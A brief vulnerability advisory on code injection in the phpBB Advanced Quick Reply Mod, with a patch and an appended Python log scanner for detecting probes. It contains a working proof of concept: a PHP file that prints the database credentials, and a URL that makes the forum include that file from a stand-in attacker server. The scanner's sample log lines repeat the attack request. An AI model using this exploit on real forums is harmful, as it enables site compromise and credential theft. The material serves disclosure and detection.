Hai Nam Luke has found a security hole in the phpBB Advanced Quick Reply Mod (Code Injection). Attackers can exploit this Mod to inject PHP code into an existing forum, effectively compromising the site's integrity.
Credit:
The information has been provided by Hai Nam Luke.
If you create a file called 'extension.inc' containing, for example:
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
and then request the following URL:
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
the forum includes that file from the remote server and returns its own database username and password.
Patch:
Modify in quick_reply.php the following:
[FIND] if ( $mode == 'smilies' )
{
[ADD BEFORE] $phpbb_root_path = "./";
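
To check whether a forum was already probed through this parameter, the following added example (not part of the original advisory) scans web server access log lines for requests to quick_reply.php that supply phpbb_root_path. It assumes Apache common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that points the include path at another host (scheme:// or //host)
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.I)

def classify(line):
    """Return None, 'local-override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not unquote(target.path).lower().endswith('/quick_reply.php'):
        return None
    # parse_qsl percent-decodes names and values, so phpbb%5Froot%5Fpath matches
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == 'phpbb_root_path':
            value = unquote(value)  # also catch one extra layer of encoding
            return 'remote-include' if REMOTE_RE.match(value) else 'local-override'
    return None

def scan(lines):
    """Return (line_number, client, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, line.split(' ', 1)[0], verdict))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2000:10:01:02 +0000] "GET /forum/quick_reply.php?mode=smilies HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2000:10:02:10 +0000] "GET /forum/quick_reply.php?phpbb_root_path=http://192.0.2.44/&mode=smiles HTTP/1.1" 200 311',
    '203.0.113.9 - - [01/Jan/2000:10:02:31 +0000] "GET /forum/quick_reply.php?phpbb%5Froot%5Fpath=http%3A%2F%2F192.0.2.44%2F HTTP/1.0" 200 311',
    '198.51.100.23 - - [01/Jan/2000:10:05:00 +0000] "GET /forum/quick_reply.php?phpbb_root_path=../ HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2000:10:06:00 +0000] "GET /forum/viewtopic.php?t=4&phpbb_root_path=http://192.0.2.44/ HTTP/1.1" 200 900',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit)
```

Access logs record only the query string, so a value delivered another way (for example in a POST body) would not show up in this scan.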